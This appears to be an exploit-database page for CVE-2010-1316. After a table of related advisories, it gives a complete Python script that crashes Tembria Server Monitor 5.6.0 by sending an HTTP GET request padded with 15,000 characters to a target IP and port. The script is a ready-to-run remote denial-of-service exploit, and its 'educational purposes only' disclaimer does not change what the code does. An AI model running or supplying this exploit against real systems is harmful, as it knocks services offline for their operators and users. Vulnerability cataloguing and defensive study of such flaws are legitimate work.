| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Tembria Server Monitor v5.6.0 Denial of Service | 9 Apr 201000:00 | – | zdt | |
| CVE-2010-1316 | 9 Apr 201000:00 | – | circl | |
| Tembria Server Monitor Denial of Service (CVE-2010-1316) | 11 Aug 201500:00 | – | checkpoint_advisories | |
| CVE-2010-1316 | 14 Apr 201015:44 | – | cve | |
| CVE-2010-1316 | 14 Apr 201015:44 | – | cvelist | |
| EUVD-2010-1345 | 7 Oct 202500:30 | – | euvd | |
| Tembria Server Monitor 5.6.0 - Denial of Service | 9 Apr 201000:00 | – | exploitpack | |
| CVE-2010-1316 | 14 Apr 201016:00 | – | nvd | |
| Tembria Server Monitor HTTP Request Denial of Service Vulnerability | 23 Apr 201000:00 | – | openvas | |
| Tembria Server Monitor HTTP Request Denial of Service Vulnerability | 23 Apr 201000:00 | – | openvas |
#!/usr/bin/python
# Exploit Title : Tembria Server Monitor 5.6.0
# CVE-ID : CVE-2010-1316
# Date : April 9, 2010
# Author : Lincoln
# Software Link : http://www.tembria.com/
# Version : 5.6.0
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : Remote DoS
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "\n[+] Exploit for Tembria Server Monitor 5.6.0"
import socket,sys
#usage ./filename.py IP PORT
host = sys.argv[1]
port = int(sys.argv[2]) #80
buf = "GET /tembria/index.asp/" + "B" * 15000 + " A" + " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[+] DoS packet sent!\n"
s.send(buf)
s.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation